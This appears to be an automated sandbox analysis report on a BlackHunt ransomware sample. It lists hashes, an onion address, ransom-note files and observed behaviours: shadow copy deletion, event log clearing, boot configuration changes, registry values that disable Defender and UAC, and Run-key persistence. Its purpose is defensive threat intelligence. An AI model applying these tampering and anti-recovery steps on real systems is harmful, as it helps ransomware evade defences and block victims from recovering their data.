Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:46
Static task
static1
Behavioral task
behavioral1
Sample
23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe
Resource
win10v2004-20231215-en
General
-
Target
23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe
-
Size
707KB
-
MD5
29a02e4aa3525c4b2c3c9aa244c230f6
-
SHA1
6fb43902f84a559affa0b227e924ed8211707533
-
SHA256
23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1
-
SHA512
c111b29b95f707b255b871a7c6a6282caacf4ae84efa070b17dbede58f1f1718e3975a17799ee603d822be798bf2b7ceba40d54b0598480e3fdc55ae2b13376e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1L8qvnh:6uaTmkZJ+naie5OTamgEoKxLWCkh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4576 fsutil.exe 18176 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 16960 wevtutil.exe 16948 wevtutil.exe 17256 wevtutil.exe 17320 wevtutil.exe 17412 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5652 bcdedit.exe 6508 bcdedit.exe 17444 bcdedit.exe 17848 bcdedit.exe -
Renames multiple (3358) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8848 wbadmin.exe 18088 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\H: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\Z: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\U: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\B: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\S: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\J: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\X: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\I: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\N: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\M: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\G: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\P: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\L: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\W: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\T: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\Y: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\A: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\K: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\ui-strings.js 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\management.properties 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaSansDemiBold.ttf 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons2x.png 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\version.js 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover_2x.png 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\or\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\VideoLAN\VLC\locale\th\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\natives_blob.bin 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\ui-strings.js 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\packager.jar 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ar-ae\#BlackHunt_ReadMe.txt 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cryptix.md 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_Private.key 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\#BlackHunt_ReadMe.hta 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-tw_get.svg 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 19620 19452 WerFault.exe 289 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2280 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4676 vssadmin.exe 4832 vssadmin.exe 2792 vssadmin.exe 3396 vssadmin.exe 3536 vssadmin.exe 17680 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 19296 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 19164 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeRestorePrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeBackupPrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeTakeOwnershipPrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeAuditPrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeSecurityPrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeIncBasePriorityPrivilege 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe Token: SeBackupPrivilege 3440 vssvc.exe Token: SeRestorePrivilege 3440 vssvc.exe Token: SeAuditPrivilege 3440 vssvc.exe Token: SeBackupPrivilege 3940 wbengine.exe Token: SeRestorePrivilege 3940 wbengine.exe Token: SeSecurityPrivilege 3940 wbengine.exe Token: SeSecurityPrivilege 16960 wevtutil.exe Token: SeBackupPrivilege 16960 wevtutil.exe Token: SeSecurityPrivilege 16948 wevtutil.exe Token: SeBackupPrivilege 16948 wevtutil.exe Token: SeSecurityPrivilege 17256 wevtutil.exe Token: SeBackupPrivilege 17256 wevtutil.exe Token: SeSecurityPrivilege 17320 wevtutil.exe Token: SeBackupPrivilege 17320 wevtutil.exe Token: SeSecurityPrivilege 17412 wevtutil.exe Token: SeBackupPrivilege 17412 wevtutil.exe Token: SeDebugPrivilege 19296 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4016 wrote to memory of 4292 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 89 PID 4016 wrote to memory of 4292 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 89 PID 4016 wrote to memory of 2212 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 170 PID 4016 wrote to memory of 2212 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 170 PID 4016 wrote to memory of 4768 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 93 PID 4016 wrote to memory of 4768 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 93 PID 4016 wrote to memory of 3688 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 173 PID 4016 wrote to memory of 3688 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 173 PID 4016 wrote to memory of 3004 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 97 PID 4016 wrote to memory of 3004 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 97 PID 4016 wrote to memory of 4328 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 178 PID 4016 wrote to memory of 4328 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 178 PID 4292 wrote to memory of 3452 4292 cmd.exe 100 PID 4292 wrote to memory of 3452 4292 cmd.exe 100 PID 4768 wrote to memory of 4956 4768 cmd.exe 101 PID 4768 wrote to memory of 4956 4768 cmd.exe 101 PID 2212 wrote to memory of 4600 2212 reg.exe 103 PID 2212 wrote to memory of 4600 2212 reg.exe 103 PID 3688 wrote to memory of 688 3688 reg.exe 104 PID 3688 wrote to memory of 688 3688 reg.exe 104 PID 4016 wrote to memory of 3668 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 105 PID 4016 wrote to memory of 3668 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 105 PID 4016 wrote to memory of 2392 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 107 PID 4016 wrote to memory of 2392 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 107 PID 4016 wrote to memory of 1668 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 110 PID 4016 wrote to memory of 1668 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 110 PID 3004 wrote to memory of 1388 3004 cmd.exe 108 PID 3004 wrote to memory of 1388 3004 cmd.exe 108 PID 4328 wrote to memory of 3756 4328 reg.exe 112 PID 4328 wrote to memory of 3756 4328 reg.exe 112 PID 4016 wrote to memory of 740 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 113 PID 4016 wrote to memory of 740 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 113 PID 4016 wrote to memory of 4580 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 114 PID 4016 wrote to memory of 4580 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 114 PID 4016 wrote to memory of 2340 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 117 PID 4016 wrote to memory of 2340 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 117 PID 3668 wrote to memory of 3116 3668 cmd.exe 118 PID 3668 wrote to memory of 3116 3668 cmd.exe 118 PID 2392 wrote to memory of 2832 2392 cmd.exe 119 PID 2392 wrote to memory of 2832 2392 cmd.exe 119 PID 1668 wrote to memory of 3360 1668 cmd.exe 121 PID 1668 wrote to memory of 3360 1668 cmd.exe 121 PID 4016 wrote to memory of 4140 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 122 PID 4016 wrote to memory of 4140 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 122 PID 4016 wrote to memory of 2896 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 123 PID 4016 wrote to memory of 2896 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 123 PID 740 wrote to memory of 3300 740 cmd.exe 126 PID 740 wrote to memory of 3300 740 cmd.exe 126 PID 4016 wrote to memory of 1692 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 129 PID 4016 wrote to memory of 1692 4016 23d721502577b60c7dbc4803e8586418983553824fa82a5735263d104d163ce1.exe 129 PID 4016 wrote to memory of 2572 4016 